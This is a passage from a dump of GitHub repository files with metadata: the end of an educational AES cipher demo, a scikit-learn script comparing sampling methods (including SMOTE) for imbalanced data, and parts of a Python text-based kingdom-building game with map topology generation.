\\n\"\n\t\t\t_showBlock(auxBlock)\n\t\t\t## MixColumns ##\n\t\t\tauxBlock = libutils._mixcolumns(auxBlock)\n\t\t\tprint \"Round \" + str(x) + \" MixColumns: \\n\"\n\t\t\t_showBlock(auxBlock)\n\t\t\t## AddRoundKey ##\n\t\t\tprint \"Round \" + str(x) + \" Key to cipher in this round: \\n\"\n\t\t\t_showBlock(libutils._extractroundkey(schedule,x))\n\t\t\tprint \"Round \" + str(x) + \" Keyed: \\n\"\n\t\t\tauxBlock = libutils._addroundkey(auxBlock,libutils._extractroundkey(schedule,x))\n\t\t\t_showBlock(auxBlock)\n\t\t\t\n\t\t## Make final round ##\t\n\t\t## SubBytes ##\n\t\tauxBlock = libutils._subbytesmatrix(auxBlock)\n\t\tprint \"Final subbytes: \\n\"\n\t\t_showBlock(auxBlock)\n\t\t## ShiftRows ##\n\t\tauxBlock = libutils._shiftrows(auxBlock)\n\t\tprint \"Final shiftrows: \\n\"\n\t\t_showBlock(auxBlock)\n\t\t## AddRoundKey ##\n\t\tauxBlock = libutils._addroundkey(auxBlock,libutils._extractroundkey(schedule,10))\n\t\tprint \"Final keyed: \\n\"\n\t\t_showBlock(auxBlock)\n\t\t\t\n\t@staticmethod\n\tdef __keyschedule(cipherKey):\t\t\t\t\n\t\tantKey,schedule,actCol,i,actPos,actPosRcon = cipherKey,[],None,0,0,0\n\t\t## Fill schedule 4x40 ##\n\t\tschedule = [[0x00]*44 for i in xrange(4)]\n\t\t## Set initial status of schedule ##\n\t\tfor col in libutils._getallcolumns(antKey):\n\t\t\tschedule = libutils._changecolumn(schedule,col,actPos)\n\t\t\tactPos += 1\n\t\tfor i in xrange(40):\n\t\t\t## Take ant col ##\n\t\t\tactCol = libutils._getcolumn(schedule,actPos-1)\n\t\t\t## If is word in multiple of 4, rotword and subbytes ##\n\t\t\tif(actPos%4==0):\n\t\t\t\tactCol = libutils._rotword(actCol)\n\t\t\t\tactCol = libutils._subbytes(actCol)\n\t\t\t\tactCol = libutils._xor3columns(libutils._getcolumn(schedule,actPos-4),actCol,libutils._getcolumn(rcon,actPosRcon))\n\t\t\t\tactPosRcon += 1\n\t\t\telse:\n\t\t\t\tactCol = libutils._xor2columns(libutils._getcolumn(schedule,actPos-4),actCol)\n\t\t\tlibutils._changecolumn(schedule,actCol,actPos)\n\t\t\tactPos += 1\n\t\treturn schedule\n\t\t\n\t\nif __name__ == \"__main__\":\n\t# If there isn't arguments, values are set by default #\n\t# 1º -> CipherText (128bits Block)\n\t# 2º -> CipherKey (128bits Block)\n\tcipheralgorithms._aes()\n\t\n\n" } ]
1
brenden17/imbalanced-data
https://github.com/brenden17/imbalanced-data
008ac9ccfae891de575c41e3a957205bc24aee5d
a4d89313279eea1511faf44ae4f5c65c86415f0e
f1fb52c951bc5b386ac7d7262e4d99184fd85d94
refs/heads/master
2020-05-27T11:58:50.564233
2014-03-31T23:43:28
2014-03-31T23:43:28
15,877,418
1
1
null
null
null
null
null
[ { "alpha_fraction": 0.5781803131103516, "alphanum_fraction": 0.5883822441101074, "avg_line_length": 33.0709228515625, "blob_id": "ec649d0f95f971726a9a4002927734127ef592d8", "content_id": "242edc173e098710bd83f34d21ea854489dc188a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4803, "license_type": "no_license", "max_line_length": 80, "num_lines": 141, "path": "/imbalanceddata.py", "repo_name": "brenden17/imbalanced-data", "src_encoding": "UTF-8", "text": "\"\"\" Under sampling and over sampling on imbalanced data\nDataset : http://archive.ics.uci.edu/ml/datasets/Balance+Scale\nRef : http://bi.snu.ac.kr/Publications/Conferences/Domestic/KIISE2013f_KMKim.pdf\n\"\"\"\nimport os\nimport pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom mpl_toolkits.mplot3d import Axes3D\n\nfrom sklearn.preprocessing import LabelEncoder\nfrom sklearn.linear_model import LogisticRegression\nfrom sklearn.ensemble import ExtraTreesClassifier\nfrom sklearn.neighbors import NearestNeighbors\nfrom sklearn.svm import SVC\nfrom sklearn.cross_validation import cross_val_score, train_test_split\nfrom sklearn.metrics import classification_report\n\ndef get_fullpath(filename):\n return os.path.abspath(os.path.join(os.path.dirname(__file__), filename))\n\ndef read_file():\n return pd.read_csv(get_fullpath('balance-scale.data'), delimiter=',',\n names=['class', 'lweight', 'ldist', 'rweight', 'rdist'])\n\ndef analysis_data():\n df = read_file()\n X_outlier = df[df['class'] == 'B'] # .ix[idx]\n X_train = df[df['class'] == 'L']\n\n fig = plt.figure()\n ax = plt.axes(projection='3d')\n ax.scatter(X_outlier['lweight'], X_outlier['ldist'],\n X_outlier['rweight'], c='r')\n ax.scatter(X_train['lweight'], X_train['ldist'],\n X_train['rweight'], c='b')\n ax.set_xlabel('Mileage')\n ax.set_ylabel('Transmission')\n ax.set_zlabel('Price')\n plt.show()\n\ndef load_original_data():\n rawdata = read_file()\n le = LabelEncoder()\n X = rawdata.icol(range(1, 5)).values\n y = le.fit_transform(rawdata['B'].values)\n return X, y\n\ndef load_undersampling():\n rawdata = read_file()\n n_sample = rawdata[rawdata['class'] == 'B'].shape[0]\n B = rawdata[rawdata['class'] == 'B']\n L = rawdata[rawdata['class'] == 'L'][:n_sample]\n R = rawdata[rawdata['class'] == 'R'][:n_sample]\n d = pd. concat([B, L, R])\n le = LabelEncoder()\n X = d.icol(range(1, 5)).values\n y = le.fit_transform(d['class'].values)\n return X, y\n\ndef load_sampling():\n size = 200\n rawdata = read_file()\n n_sample = rawdata[rawdata['class'] == 'B'].shape[0]\n idx = np.random.randint(0, n_sample, size)\n B = rawdata[rawdata['class'] == 'B'].iloc[idx]\n\n n_sample = rawdata[rawdata['class'] == 'L'].shape[0]\n idx = np.random.randint(0, n_sample, size)\n L = rawdata[rawdata['class'] == 'L'].iloc[idx]\n\n n_sample = rawdata[rawdata['class'] == 'R'].shape[0]\n idx = np.random.randint(0, n_sample, size)\n R = rawdata[rawdata['class'] == 'R'].iloc[idx]\n\n df = pd.concat([B, L, R])\n\n le = LabelEncoder()\n X = df.icol(range(1, 5)).values\n y = le.fit_transform(df['class'].values)\n return X, y\n\ndef load_data_with_SMOTE():\n rawdata = read_file()\n size = 150\n small = rawdata[rawdata['class'] == 'B']\n n_sample = small.shape[0]\n idx = np.random.randint(0, n_sample, size)\n X = small.iloc[idx, range(1, 5)].values\n y = small.iloc[idx, 0].values\n knn = NearestNeighbors(n_neighbors=2)\n knn.fit(X)\n _d, i = knn.kneighbors(X)\n idx2 = i[:, 1]\n diff = X - X[idx2]\n X = X + np.random.random(4) * diff\n B = np.concatenate([np.transpose(y[np.newaxis]), X], axis=1)\n B = pd.DataFrame(B)\n\n n_sample = rawdata[rawdata['class'] == 'L'].shape[0]\n idx = np.random.randint(0, n_sample, size)\n L = rawdata[rawdata['class'] == 'L'].iloc[idx]\n\n n_sample = rawdata[rawdata['class'] == 'R'].shape[0]\n idx = np.random.randint(0, n_sample, size)\n R = rawdata[rawdata['class'] == 'R'].iloc[idx]\n\n d = np.concatenate([B.values, L.values, R.values])\n\n le = LabelEncoder()\n X = d[:, 1:5]\n y = le.fit_transform(d[:, 0])\n return X, y\n\ndef create_learners():\n return [ExtraTreesClassifier(), SVC(), LogisticRegression()]\n\ndef analysis(load_function):\n X, y = load_function()\n X_train, X_test, Y_train, Y_test, = \\\n train_test_split(X, y,\n test_size=0.3, random_state=42)\n size = 3\n learners = create_learners()\n for learner in learners:\n print '%s -\\t\\t %f' % (learner.__class__.__name__,\n sum(cross_val_score(learner, X, y, cv=size)) / size)\n learner.fit(X_train, Y_train)\n Y_predict = learner.predict(X_test)\n print learner.__class__.__name__\n print classification_report(Y_test, Y_predict)\n\nif __name__ == '__main__':\n print \"=================== Original Data ===================\"\n analysis(load_original_data)\n print \"=================== Under Sampling ===================\"\n analysis(load_undersampling)\n print \"=================== Sampling ===================\"\n analysis(load_sampling)\n print \"=================== SMOTE ===================\"\n analysis(load_data_with_SMOTE)" }, { "alpha_fraction": 0.6877828240394592, "alphanum_fraction": 0.7058823704719543, "avg_line_length": 23.66666603088379, "blob_id": "a53ea4f37321df6b0555f799da70803c66ded215", "content_id": "b1286b54b34602389276e9d195a8e6bae17d0d5c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 277, "license_type": "no_license", "max_line_length": 80, "num_lines": 9, "path": "/README.md", "repo_name": "brenden17/imbalanced-data", "src_encoding": "UTF-8", "text": "imbalanced data\n================\n불균형 데이터를 해결하기 위해 몇가지 방법을 사용한다.\n\n## data set\nhttp://archive.ics.uci.edu/ml/datasets/Balance+Scale\n\n## 사용한 논문\nRef : http://bi.snu.ac.kr/Publications/Conferences/Domestic/KIISE2013f_KMKim.pdf" } ]
2
kushal124/pypackaging-test
https://github.com/kushal124/pypackaging-test
f36f51972304fba96b362aec35397a60413496af
75ab051223e2c17aef28d40cd594b6b393fc3b1d
b55327d0008e8f6b29390498a58e808d28586b19
refs/heads/master
2020-04-06T04:52:34.102045
2015-03-07T21:23:06
2015-03-07T21:23:06
31,827,987
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.5573248267173767, "alphanum_fraction": 0.5732483863830566, "avg_line_length": 27.454545974731445, "blob_id": "2c984f81c29324f59233d5dcbcc5a7a589375494", "content_id": "168484fbbefc1f472f40461219c6cc96143fbd0b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 314, "license_type": "no_license", "max_line_length": 59, "num_lines": 11, "path": "/setup.py", "repo_name": "kushal124/pypackaging-test", "src_encoding": "UTF-8", "text": "from setuptools import setup\n\nsetup(name='funniest',\n version='0.1',\n description='A test package',\n url = 'http:/github.com/kushal124/pypackagingtest',\n author = 'Kushal',\n author_email = \"[email protected]\",\n license='MIT',\n packages=['funniest'],\n zip_safe=False)\n\n" }, { "alpha_fraction": 0.6618704795837402, "alphanum_fraction": 0.6618704795837402, "avg_line_length": 22.16666603088379, "blob_id": "34802adf281fceb1d7ed7deed9c359f3699d30bd", "content_id": "9c8b486100c5261980804e31f638514e8e038707", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 139, "license_type": "no_license", "max_line_length": 59, "num_lines": 6, "path": "/funniest/__init__.py", "repo_name": "kushal124/pypackaging-test", "src_encoding": "UTF-8", "text": "def testfunction():\n '''\n This is a test function for learning pythong packaging.\n\n '''\n return \"TestFunction is being called\"\n" } ]
2
kwoolter/Kingdom2
https://github.com/kwoolter/Kingdom2
8a653a4acc1c2a09a927a75cf426e9dfe02605f3
5df5b1034270fc0b80fb8be21acd2d94b9950564
1bd5357c2109cfc6108b008875fc05bc70c09df2
refs/heads/master
2020-04-21T23:46:49.843067
2019-02-13T13:55:21
2019-02-13T13:55:21
169,957,292
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.5423162579536438, "alphanum_fraction": 0.5456570386886597, "avg_line_length": 19.9069766998291, "blob_id": "a775eaa09b834ba1f339b8b1449df130964d3ece", "content_id": "84f5f16c39bb0f1b74119b8323cc64066354c42f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 898, "license_type": "no_license", "max_line_length": 80, "num_lines": 43, "path": "/kingdom2/model/utils.py", "repo_name": "kwoolter/Kingdom2", "src_encoding": "UTF-8", "text": "import collections\n\nclass Event():\n # Event Types\n DEFAULT = \"default\"\n STATE = \"state\"\n GAME = \"game\"\n\n def __init__(self, name: str, description: str = None, type: str = DEFAULT):\n self.name = name\n self.description = description\n self.type = type\n\n def __str__(self):\n return \"{0}:{1} ({2})\".format(self.name, self.description, self.type)\n\n\nclass EventQueue():\n def __init__(self):\n self.events = collections.deque()\n\n def add_event(self, new_event: Event):\n self.events.append(new_event)\n\n def pop_event(self):\n return self.events.pop()\n\n def size(self):\n return len(self.events)\n\n def print(self):\n for event in self.events:\n print(event)\n\ndef is_numeric(s):\n try:\n x = int(s)\n except:\n try:\n x = float(s)\n except:\n x = None\n return x" }, { "alpha_fraction": 0.6800000071525574, "alphanum_fraction": 0.746666669845581, "avg_line_length": 14, "blob_id": "2c537f6577027b34cf39f55d5fb617891db2afd1", "content_id": "ce743baebe56b724b60a32fd412df70d7ab40a96", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 75, "license_type": "no_license", "max_line_length": 34, "num_lines": 5, "path": "/README.md", "repo_name": "kwoolter/Kingdom2", "src_encoding": "UTF-8", "text": "# Kingdom 2\n:copyright: kwoolter :monkey: 2019\n\n## About\nConstruction game\n" }, { "alpha_fraction": 0.800000011920929, "alphanum_fraction": 0.800000011920929, "avg_line_length": 24, "blob_id": "5cbb3351a98ae0ead47e698890817de978045b96", "content_id": "70c37a6e93341b26be8be07119ac4d58859d06f2", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 25, "license_type": "no_license", "max_line_length": 24, "num_lines": 1, "path": "/kingdom2/controller/__init__.py", "repo_name": "kwoolter/Kingdom2", "src_encoding": "UTF-8", "text": "from .cli import GameCLI\n" }, { "alpha_fraction": 0.8500000238418579, "alphanum_fraction": 0.8500000238418579, "avg_line_length": 39, "blob_id": "2e7814f0a169c99da80a691e08580c430bd7294f", "content_id": "6214908b7396a375bdc531810a10bd98b541e740", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 200, "license_type": "no_license", "max_line_length": 45, "num_lines": 5, "path": "/kingdom2/view/__init__.py", "repo_name": "kwoolter/Kingdom2", "src_encoding": "UTF-8", "text": "from .text_view import TextView\nfrom .text_view import InventoryTextView\nfrom .text_view import CreationsTextView\nfrom .text_view import WorldMapTextView\nfrom .text_view import WorldTopoModelTextView\n" }, { "alpha_fraction": 0.5609022378921509, "alphanum_fraction": 0.5699248313903809, "avg_line_length": 24.834951400756836, "blob_id": "ef3deff0ef914106225bb842e62ce745daf5a21d", "content_id": "058fa29a8a1abe239d26a680292e6c9ebae8c51b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2660, "license_type": "no_license", "max_line_length": 104, "num_lines": 103, "path": "/kingdom2/controller/cli.py", "repo_name": "kwoolter/Kingdom2", "src_encoding": "UTF-8", "text": "import cmd\nfrom .utils import *\nimport logging\nimport os\nimport random\n\nimport kingdom2.model as model\nimport kingdom2.view as view\n\nclass GameCLI(cmd.Cmd):\n\n intro = \"Welcome to The Kingdom 2.\\nType 'start' to get going!\\nType 'help' for a list of commands.\"\n prompt = \"What next?\"\n\n def __init__(self):\n\n super(GameCLI, self).__init__()\n\n self.model = model.Game(\"Kingdom 2\")\n self.view = view.TextView(self.model)\n\n def run(self):\n self.cmdloop()\n\n def emptyline(self):\n pass\n\n def do_quit(self, arg):\n \"\"\"Quit the game\"\"\"\n try:\n\n if confirm(\"Are you sure you want to quit?\") is True:\n print(\"\\nThanks for playing.\")\n\n self.model.do_game_over()\n self.print_events()\n\n print(str(self.model))\n print(\"\\nBye bye.\")\n\n except Exception as err:\n print(str(err))\n\n def do_start(self, arg):\n\n self.model.start()\n self.print_events()\n\n def do_tick(self, arg : str = \"1\"):\n\n i = is_numeric(arg)\n if i is not None:\n for i in range (0, i):\n self.model.tick()\n self.view.tick()\n\n self.print_events()\n\n def do_print(self, arg):\n self.view.draw()\n\n def do_inv(self, arg):\n inv_view = view.InventoryTextView(self.model.inventory)\n inv_view.draw()\n\n def do_map(self, arg):\n map_view = view.WorldMapTextView(self.model.map)\n map_view.draw()\n #map_view.draw((5,5,10,10))\n\n def do_topo(self, arg):\n map_view = view.WorldTopoModelTextView(self.model.map)\n map_view.draw()\n #map_view.draw((5,5,10,10))\n\n def do_test(self, arg):\n\n resource_types = model.ResourceFactory.get_resource_types()\n\n for type in resource_types:\n new_resource = model.ResourceFactory.get_resource(type)\n self.model.inventory.add_resource(new_resource, random.randint(20,60))\n\n self.model.inventory.print()\n\n for creatable_name in self.model.creatables.names:\n creatable = self.model.creatables.get_creatable_copy(creatable_name)\n ok = self.model.inventory.is_creatable(creatable)\n print(\"{0}: creatable = {1}\".format(creatable.name, ok))\n self.model.add_creation(creatable)\n\n def print_events(self):\n\n # Print any events that got raised\n event = self.model.get_next_event()\n if event is not None:\n print(\"Game event(s)...\")\n\n while event is not None:\n\n print(\" * \" + str(event))\n\n event = self.model.get_next_event()" }, { "alpha_fraction": 0.5544041395187378, "alphanum_fraction": 0.5640085935592651, "avg_line_length": 31.496919631958008, "blob_id": "e6caa164ed94d73aff524dff58f13dbd5d14eb8b", "content_id": "054001e090ab6e7c9a7e35107babbdb359db54eb", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 15826, "license_type": "no_license", "max_line_length": 107, "num_lines": 487, "path": "/kingdom2/model/building_blocks.py", "repo_name": "kwoolter/Kingdom2", "src_encoding": "UTF-8", "text": "import copy\nimport csv\nimport logging\nimport random\nfrom xml.dom.minidom import *\n\nimport numpy\n\nfrom .utils import is_numeric\n\n\nclass Resource:\n CATEGORY_DEFAULT = \"default\"\n\n def __init__(self, name: str, description: str, category: str = CATEGORY_DEFAULT, graphic: str = None):\n self.name = name\n self.description = description\n self.category = category\n self.graphic = graphic\n\n def __str__(self):\n _str = \"{0} ({3}): {1} ({2})\".format(self.name, self.description, self.category, self.graphic)\n return _str\n\n\nclass Creatable():\n\n def __init__(self, name: str, description: str, ticks_required: int = 10):\n self.name = name\n self.description = description\n self.pre_requisites = {}\n self.ticks_done = 0\n self.ticks_required = ticks_required\n self.output = {}\n\n def __str__(self):\n\n _str = \"{0} ({1}) {2}% complete\".format(self.name, self.description, self.percent_complete)\n\n if len(self.pre_requisites.keys()) > 0:\n _str += \"\\n\\tPre-requisites:\"\n for k, v in self.pre_requisites.items():\n _str += \"\\n\\t\\t- {0}:{1}\".format(k, v)\n\n if len(self.output.keys()) > 0:\n _str += \"\\n\\tOutputs:\"\n for k, v in self.output.items():\n _str += \"\\n\\t\\t- {0}:{1}\".format(k, v)\n\n return _str\n\n @property\n def is_complete(self):\n return self.ticks_done >= self.ticks_required\n\n @property\n def percent_complete(self):\n try:\n percent_complete = int(min(100, self.ticks_done * 100 / self.ticks_required))\n except Exception as err:\n print(\"{0}/{1}\".format(self.ticks_done, self.ticks_required))\n print(str(err))\n percent_complete = 0\n\n return percent_complete\n\n def add_pre_requisite(self, new_resource_name: str, item_count: int = 1):\n\n if new_resource_name not in self.pre_requisites.keys():\n self.pre_requisites[new_resource_name] = 0\n\n self.pre_requisites[new_resource_name] += item_count\n\n def add_output(self, new_resource_name: str, item_count: int = 1):\n\n if new_resource_name not in self.output.keys():\n self.output[new_resource_name] = 0\n\n self.output[new_resource_name] += item_count\n\n def tick(self):\n if self.is_complete is False:\n self.ticks_done += 1\n if self.is_complete is True:\n self.do_complete()\n\n def do_complete(self):\n print(\"Construction complete for {0}!\".format(self.name))\n\n\nclass Inventory():\n\n def __init__(self):\n\n self.resources = {}\n\n @property\n def resource_type_count(self):\n return len(self.resources.keys())\n\n def add_resource(self, new_resource: Resource, item_count: int = 1):\n\n if new_resource not in self.resources.keys():\n self.resources[new_resource] = 0\n\n self.resources[new_resource] += item_count\n\n def is_creatable(self, new_creatable: Creatable):\n\n is_creatable = True\n\n for pre_req_name, count in new_creatable.pre_requisites.items():\n pre_req = ResourceFactory.get_resource(pre_req_name)\n if pre_req not in self.resources.keys():\n is_creatable = False\n break\n else:\n inv_count = self.resources[pre_req]\n if count > inv_count:\n is_creatable = False\n break\n\n return is_creatable\n\n def print(self):\n if len(self.resources.keys()) > 0:\n _str = \"Inventory ({0} resource types)\".format(self.resource_type_count)\n for k, v in self.resources.items():\n _str += \"\\n\\t{0} ({1}) : {2}\".format(k.name, k.description, v)\n else:\n _str = \"No resources in your inventory!\"\n\n print(_str)\n\n\nclass ResourceFactory:\n resources = {}\n\n def __init__(self, file_name: str):\n\n self.file_name = file_name\n\n @staticmethod\n def get_resource(name: str):\n resource = None\n\n if name in ResourceFactory.resources.keys():\n resource = ResourceFactory.resources[name]\n\n return resource\n\n @staticmethod\n def get_resource_copy(name: str):\n resource = None\n\n if name in ResourceFactory.resources.keys():\n resource = copy.deepcopy(ResourceFactory.resources[name])\n\n return resource\n\n @staticmethod\n def get_resource_types():\n\n return list(ResourceFactory.resources.keys())\n\n def load(self):\n\n print(\"\\nLoading resources...\")\n\n # Attempt to open the file\n with open(self.file_name, 'r') as object_file:\n\n # Load all rows in as a dictionary\n reader = csv.DictReader(object_file)\n\n # For each row in the file....\n for row in reader:\n name = row.get(\"Name\")\n description = row.get(\"Description\")\n category = row.get(\"Category\")\n graphic = row.get(\"Graphic\")\n if graphic == \"\":\n graphic = None\n\n new_resource = Resource(name, description, category, graphic)\n ResourceFactory.resources[new_resource.name] = new_resource\n\n print(str(new_resource))\n\n # Close the file\n object_file.close()\n\n print(\"\\n{0} resources loaded.\".format(len(self.resources.keys())))\n\n\nclass CreatableFactoryXML(object):\n '''\n Load some creatables from an XML file and store them in a dictionary\n '''\n\n def __init__(self, file_name: str):\n\n self.file_name = file_name\n self._dom = None\n self._creatables = {}\n\n @property\n def count(self):\n return len(self._creatables)\n\n @property\n def names(self):\n return list(self._creatables.keys())\n\n # Load in the quest contained in the quest file\n def load(self):\n\n self._dom = parse(self.file_name)\n\n assert self._dom.documentElement.tagName == \"creatables\"\n\n logging.info(\"%s.load(): Loading in %s\", __class__, self.file_name)\n\n # Get a list of all quests\n creatables = self._dom.getElementsByTagName(\"creatable\")\n\n # for each quest...\n for creatable in creatables:\n\n # Get the main tags that describe the quest\n name = self.xml_get_node_text(creatable, \"name\")\n desc = self.xml_get_node_text(creatable, \"description\")\n ticks_required = self.xml_get_node_value(creatable, \"ticks_required\")\n\n # ...and create a basic creatable object\n new_creatable = Creatable(name=name, description=desc, ticks_required=ticks_required)\n\n logging.info(\"%s.load(): Loading Creatable '%s'...\", __class__, new_creatable.name)\n\n # Next get a list of all of the pre-requisites\n pre_requisites = creatable.getElementsByTagName(\"pre_requisites\")[0]\n resources = pre_requisites.getElementsByTagName(\"resource\")\n\n # For each pre-requisite resource...\n for resource in resources:\n # Get the basic details of the resource\n name = self.xml_get_node_text(resource, \"name\")\n count = self.xml_get_node_value(resource, \"count\")\n\n new_creatable.add_pre_requisite(name, count)\n\n logging.info(\"{0}.load(): adding pre-req {1} ({2})\".format(__class__, name, count))\n\n # Next get a list of all of the outputs\n pre_requisites = creatable.getElementsByTagName(\"outputs\")[0]\n resources = pre_requisites.getElementsByTagName(\"resource\")\n\n # For each output resource...\n for resource in resources:\n\n # Get the basic details of the resource\n name = self.xml_get_node_text(resource, \"name\")\n count = self.xml_get_node_value(resource, \"count\")\n action = self.xml_get_node_text(resource, \"action\")\n if action is not None:\n action = \"replace\"\n else:\n action = \"inventory\"\n\n new_creatable.add_output(name, count)\n\n logging.info(\"{0}.load(): adding output {1} ({2})\".format(__class__, name, count))\n\n logging.info(\"{0}.load(): Creatable '{1}' loaded\".format(__class__, new_creatable.name))\n print(str(new_creatable))\n\n # Add the new creatable to the dictionary\n self._creatables[new_creatable.name] = new_creatable\n\n self._dom.unlink()\n\n # From a specified node get the data value\n def xml_get_node_text(self, node, tag_name: str):\n\n tag = node.getElementsByTagName(tag_name)\n\n # If the tag exists then get the data value\n if len(tag) > 0:\n value = tag[0].firstChild.data\n # Else use None\n else:\n value = None\n\n return value\n\n def xml_get_node_value(self, node, tag_name: str):\n\n value = self.xml_get_node_text(node, tag_name)\n\n return is_numeric(value)\n\n def print(self):\n for creatable in self._creatables.values():\n print(creatable)\n\n def get_creatable(self, name: str):\n\n return self._creatables[name]\n\n def get_creatable_copy(self, name: str):\n return copy.deepcopy(self._creatables[name])\n\n\nclass WorldMap:\n TILE_GRASS = \"Grass\"\n TILE_SEA = \"Sea\"\n\n def __init__(self, name: str, width: int = 50, height: int = 50):\n self.name = name\n self._width = width\n self._height = height\n self.map = []\n self.topo_model_pass2 = []\n\n def initialise(self):\n\n # Generate a topology model for the map\n self.generate_topology()\n\n # Clear the map squares\n self.map = [[None for y in range(0, self._height)] for x in range(0, self._width)]\n\n grass = ResourceFactory.get_resource_copy(WorldMap.TILE_GRASS)\n self.add_objects(grass.graphic, 40)\n\n grass = ResourceFactory.get_resource_copy(WorldMap.TILE_SEA)\n self.add_objects(grass.graphic, 40)\n\n def generate_topology(self):\n\n # Topo controls\n MAX_ALTITUDE = 10.0\n MIN_ALTITUDE_CLIP_FACTOR = -0.5\n ALTITUDE_OFFSET = 0.0\n MIN_ALTITUDE = 0.0\n MAX_SLOPE = MAX_ALTITUDE * 0.15\n MIN_SLOPE = MAX_SLOPE * -1.0\n MAX_SLOPE_DELTA = MAX_SLOPE * 2.0\n\n # Clear the topo model\n topo_model_pass1 = [[None for y in range(0, self._height)] for x in range(0, self._width)]\n self.topo_model_pass2 = [[None for y in range(0, self._height)] for x in range(0, self._width)]\n\n # Create an initial topography using altitudes and random slope changes\n print(\"Pass 1: altitudes and slopes...\")\n\n # Set the first square to be a random altitude with slopes in range\n topo_model_pass1[0][0] = (random.uniform(MIN_ALTITUDE, MAX_ALTITUDE),\n random.uniform(MIN_SLOPE, MAX_SLOPE),\n random.uniform(MIN_SLOPE, MAX_SLOPE))\n\n for y in range(0, self._height):\n for x in range(0, self._width):\n if y == 0:\n north_slope = random.uniform(MIN_SLOPE, MAX_SLOPE)\n north_altitude = random.uniform(MIN_ALTITUDE, MAX_ALTITUDE)\n # north_altitude = 0\n else:\n north_altitude, tmp, north_slope = topo_model_pass1[x][y - 1]\n\n if x == 0:\n west_slope = random.uniform(MIN_SLOPE, MAX_SLOPE)\n west_altitude = random.uniform(MIN_ALTITUDE, MAX_ALTITUDE)\n # west_altitude = 0\n else:\n west_altitude, west_slope, tmp = topo_model_pass1[x - 1][y]\n\n clip = lambda n, minn, maxn: max(min(maxn, n), minn)\n\n altitude = ((north_altitude + north_slope) + (west_altitude + west_slope)) / 2\n altitude = clip(altitude, MIN_ALTITUDE, MAX_ALTITUDE)\n\n east_slope = west_slope + ((random.random() * MAX_SLOPE_DELTA) - MAX_SLOPE_DELTA / 2)\n east_slope = clip(east_slope, MIN_SLOPE, MAX_SLOPE)\n\n south_slope = north_slope + ((random.random() * MAX_SLOPE_DELTA) - MAX_SLOPE_DELTA / 2)\n south_slope = clip(south_slope, MIN_SLOPE, MAX_SLOPE)\n\n topo_model_pass1[x][y] = (altitude, east_slope, south_slope)\n\n print(\"Pass 2: averaging out using neighbouring points...\")\n\n # Perform second pass averaging based on adjacent altitudes to smooth out topography\n # Define which neighboring points we are going to look at\n vectors = ((1, 0), (-1, 0), (0, 1), (0, -1), (1, 1), (-1, -1), (1, -1), (-1, 1))\n\n # Iterate through each point in the map\n for y in range(0, self._height):\n for x in range(0, self._width):\n\n # Get the height of the current point\n local_altitude_total, es, ss = topo_model_pass1[x][y]\n local_altitude_points = 1\n\n # Get the heights of the surrounding points\n for dx, dy in vectors:\n if x + dx < 0 or x + dx >= self._width or y + dy < 0 or y + dy >= self._height:\n pass\n else:\n local_altitude, es, ss = topo_model_pass1[x + dx][y + dy]\n local_altitude_total += local_altitude\n local_altitude_points += 1\n\n average_altitude = (local_altitude_total / local_altitude_points)\n\n # Record the average altitude in a new array\n self.topo_model_pass2[x][y] = average_altitude\n\n # Perform 3rd pass clipping to create floors in the topology\n a = numpy.array(self.topo_model_pass2)\n avg = numpy.mean(a)\n std = numpy.std(a)\n threshold = avg - (std * MIN_ALTITUDE_CLIP_FACTOR)\n a[a < threshold] = threshold\n self.topo_model_pass2 = a.tolist()\n\n print(\"Pass 3: applying altitude floor of {0:.3}...\".format(threshold))\n\n @property\n def width(self):\n return len(self.map)\n\n @property\n def height(self):\n return len(self.map[0])\n\n # Are the specified coordinates within the area of the map?\n def is_valid_xy(self, x: int, y: int):\n\n result = False\n\n if x >= 0 and x < self.width and y >= 0 and y < self.height:\n result = True\n\n return result\n\n # Get a map square at the specified co-ordinates\n def get(self, x: int, y: int):\n\n if self.is_valid_xy(x, y) is False:\n raise Exception(\"Trying to get tile at ({0},{1}) which is outside of the world!\".format(x, y))\n\n return self.map[x][y]\n\n def get_range(self, x: int, y: int, width: int, height: int):\n\n a = numpy.array(self.topo_model_pass2, order=\"F\")\n b = a[x:x + width, y:y + height]\n\n return b.tolist()\n\n # Set a map square at the specified co-ordinates with the specified object\n def set(self, x: int, y: int, c):\n\n if self.is_valid_xy(x, y) is False:\n raise Exception(\"Trying to set tile at ({0},{1}) which is outside of the world!\".format(x, y))\n\n self.map[x][y] = c\n\n def get_altitude(self, x: int, y: int):\n return self.topo_model_pass2[x][y]\n\n # Add objects to random tiles\n def add_objects(self, object_type, count: int = 20):\n\n for i in range(0, count):\n x = random.randint(0, self.width - 1)\n y = random.randint(0, self.height - 1)\n if self.get(x, y) is None:\n self.set(x, y, object_type)\n\n\nclass MapSquare:\n\n def __init__(self, content: str, altitude: float = 0.0):\n self.content = content\n self.altitude = altitude\n" }, { "alpha_fraction": 0.5834343433380127, "alphanum_fraction": 0.5878787636756897, "avg_line_length": 25.340425491333008, "blob_id": "a5c896ba47dcf46782db277ef092beca5a3a31b0", "content_id": "67a731cfb2fe9c3b7d1da50260f6445a729489a4", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2475, "license_type": "no_license", "max_line_length": 109, "num_lines": 94, "path": "/kingdom2/model/model.py", "repo_name": "kwoolter/Kingdom2", "src_encoding": "UTF-8", "text": "import logging\nimport os\nfrom .utils import Event\nfrom .utils import EventQueue\nfrom .building_blocks import Resource\nfrom .building_blocks import Inventory\nfrom .building_blocks import Creatable\nfrom .building_blocks import ResourceFactory\nfrom .building_blocks import CreatableFactoryXML\nfrom .building_blocks import 